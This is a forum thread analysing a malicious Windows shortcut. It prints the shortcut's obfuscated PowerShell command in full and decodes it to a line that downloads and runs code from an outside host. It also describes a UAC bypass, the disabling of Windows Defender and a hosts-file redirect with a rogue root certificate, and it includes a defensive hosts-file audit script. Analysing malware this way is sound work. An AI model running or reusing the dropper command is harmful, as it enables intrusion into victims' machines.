Is this a malware invocation of PowerShell?

This is definitely malware!

Basically this is malware with multiple stages. So far I have gone through:

Stage 1 (the .lnk file)

Downloads and executes powershell code from http://zvd.us/1

Stage 2

The downloaded powershell code contains a verbatim copy of https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1, which seems to be some UAC bypass. It then downloads and executes (as admin) a batch file.

Stage 3

The batch file first tries to disable all Windows Defender components (drivers, scheduled tasks, autorun entries) and adds group policies to that effect. It then downloads and executes 2 files. I will post VirusTotal links to the files.

  1. https://www.virustotal.com/#/file/29ea855339856181c2419b9573b8fd7aafb55b5d1cc0d5c9cb2648e2ef2582f7
  2. https://www.virustotal.com/#/file/6055ef00b9b5f1d7a5c05ef9649d367bab071db3736d8dca2bac67d0afe768de

The first seems to be a recognised malware, whereas the second is an NSIS installer which I have yet to analyze fully. It seems to replace the system's hosts file with its own, redirecting many domains to 80.241.222.137, and it installs a root certificate.
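The hosts-file tampering described in Stage 3 above is easy to check for on a suspect machine. The script below is an added example, not code from the thread or from the malware: it parses a hosts file and flags any non-loopback address that has many distinct hostnames pinned to it. The hosts content is constructed here for the demonstration; the address 80.241.222.137 is the one reported in the answer, and the `threshold` of 3 names is an arbitrary choice.

```python
"""
Added example (not from the original thread): audit a Windows-style hosts file
for the kind of tampering described above, where many domains are redirected
to one non-loopback address.
"""
import ipaddress
from collections import defaultdict

# Constructed sample resembling a tampered hosts file (not a real capture).
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
80.241.222.137  www.example-bank.test
80.241.222.137  login.example-mail.test
80.241.222.137  update.example-av.test
192.168.1.10    printer.local
"""


def parse_hosts(text):
    """Return a list of (ip, hostname) pairs, ignoring comments and blank lines."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop trailing comments
        if not line:
            continue
        parts = line.split()
        ip, names = parts[0], parts[1:]
        try:
            ipaddress.ip_address(ip)
        except ValueError:
            continue  # malformed line: skip it rather than crash
        for name in names:
            entries.append((ip, name.lower()))
    return entries


def suspicious_redirects(entries, threshold=3):
    """
    Group hostnames by target address and flag every non-loopback,
    non-unspecified address that has at least `threshold` distinct names
    pointed at it. Returns {ip: sorted list of hostnames}.
    """
    by_ip = defaultdict(set)
    for ip, name in entries:
        by_ip[ip].add(name)
    flagged = {}
    for ip, names in by_ip.items():
        addr = ipaddress.ip_address(ip)
        if addr.is_loopback or addr.is_unspecified:
            continue  # normal localhost entries
        if len(names) >= threshold:
            flagged[ip] = sorted(names)
    return flagged


if __name__ == "__main__":
    hits = suspicious_redirects(parse_hosts(SAMPLE_HOSTS))
    for ip, names in hits.items():
        print(f"{ip} pins {len(names)} names: {', '.join(names)}")
```

On a real Windows host you would read `%SystemRoot%\System32\drivers\etc\hosts` instead of the constructed sample; a legitimate hosts file rarely maps more than a handful of names to the same public address, so a hit here is worth a closer look together with the machine's certificate store, since the same installer adds a root certificate.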


@zoredache seems to have the gist. It's just executing the command in a window with no profile loaded, with execution policy in bypass mode (don't require code signing).

You can test with the following (I've added the 3 parentheses at the end but I feel something is missing.)

$value = [stRiNG]::join('',(( 26 ,95 , 77 , 78 , 70 ,30,3 , 30, 22 , 22, 112,91 , 73 ,19,113, 92, 84,91 , 93,74 , 30, 109 , 71 ,77, 74,91,83 ,16 ,112 ,91 , 74, 16, 105,91 ,92 , 125 , 82)))
Write-Host $value
2695777870303302222112917319113928491937430109717774918316112917416105919212582

No idea what that code is but I think the idea was to concatenate DEC ASCII character codes into a string. Your "Hallo World!" appears to be off the mark from what I can tell. For starters, there are a lot more characters in the string than you've got.

http://www.asciitable.com/ would suggest the following:

SUB _ M N F RS ETX RS SYN SYN p [ I DC3 q \ T [ ] J RS m G M J [ S DLE p [ J DLE i Z \ } R


I got a bit further with this, as the same just happened on my partner's computer. The LNK file's target is actually much longer than what fits in the box in the properties window. With linkanalyzer I retrieved the full target:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP  [stRiNG]::join('',(( 26 ,95 , 77 , 78 , 70 ,30,3 , 30, 22 , 22, 112,91 , 73 ,19,113, 92, 84,91 , 93,74 , 30, 109 , 71 ,77, 74,91,83 ,16 ,112 ,91 , 74, 16, 105,91 ,92 , 125 , 82 ,87, 91 , 80 ,74 ,23 , 23,16,122,81 ,73,80 ,82 , 81 , 95, 90 , 109, 74 ,76,87,80 , 89,22, 25 , 86 , 74, 74 ,78, 4, 17 ,17 , 68,72 , 92 ,16 ,75,77 ,17 ,15 ,25,23 ,5 , 119, 123 ,102 ,30, 26, 95, 77 ,78 , 70 )|fOReAch-ObjECT {[cHAr] ($_ -bXOr'0x3E')}) ) | .( $EnV:coMsPeC[4,24,25]-jOiN'')

In the above command, everything up to the |. creates a list of numbers, does some sort of binary XOR operation on each of the numbers, then joins the result as a string. I believe this is a way of obfuscating code. The result is:

$aspx = ((New-Object System.Net.WebClient)).DownloadString('http://zvb.us/1');IEX $aspx

This then gets piped into ( $EnV:coMsPeC[4,24,25]-jOiN'').

COMSPEC is the command line interpreter, but I don't know what the [4,24,25]-jOiN part is supposed to do. In the best case it just downloads the URL in the DownloadString function and that's all; in the worst case it downloads something then executes that. I'm not brave enough to follow the URL.

All in all I would say this does look very much like malware, but it would be great if someone with experience in powershell could comment.